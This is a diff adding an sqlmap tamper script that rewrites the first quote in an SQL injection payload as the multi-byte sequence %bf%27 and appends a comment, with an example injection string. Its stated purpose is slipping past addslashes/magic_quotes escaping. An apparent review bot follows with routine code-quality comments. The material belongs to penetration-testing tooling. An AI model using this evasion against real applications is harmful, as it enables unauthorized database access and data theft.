1+ #!/usr/bin/env python
2+
3+ """
4+ $Id$
5+
6+ Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
7+ See the file 'doc/COPYING' for copying permission
8+ """
9+
10+ import re
11+ import os
12+ import random
13+
14+ from lib .core .common import singleTimeWarnMessage
15+ from lib .core .enums import DBMS
16+ from lib .core .enums import PRIORITY
17+
18+ __priority__ = PRIORITY .NORMAL
19+
20+ def dependencies ():
21+ pass
22+
23+ def tamper (payload ):
24+ """
25+ Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
26+
27+ Example:
28+ * Input: 1' AND 1=1
29+ * Output: 1%bf%27 AND 1=1--%20
30+
31+ Notes:
32+ * Useful for bypassing magic_quotes/addslashes feature
33+
34+ Reference:
35+ * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
36+ """
37+
38+ retVal = payload
39+
40+ if payload :
41+ found = False
42+ retVal = ""
43+
44+ for i in xrange (len (payload )):
45+ if payload [i ] == '\' ' and not found :
46+ retVal += "%bf%27"
47+ found = True
48+ else :
49+ retVal += payload [i ]
50+ continue
51+
52+ if found :
53+ retVal = re .sub ("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*" , "" , retVal )
54+ retVal += "-- "
55+
56+ return retVal
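Review bot: The imports `os`, `random`, `singleTimeWarnMessage` and `DBMS` are never used in this new file, and the pattern passed to `re.sub` puts `\s` in a non-raw string; drop the unused imports and write the pattern as a raw string (`r"..."`) so it does not depend on Python passing unknown backslash escapes through unchanged. The docstring says the quote character is replaced, but the `found` flag means only the first quote in the payload is rewritten, so the summary should read `Replaces the first quote character (') ...`. The Notes section should also state the precondition, which as I read the referenced article is that the application escapes with addslashes/magic_quotes while the database connection uses a multi-byte character set; against parameterized queries or charset-aware escaping this transform has no effect. The `continue` at the end of the `else` branch is redundant and can be removed.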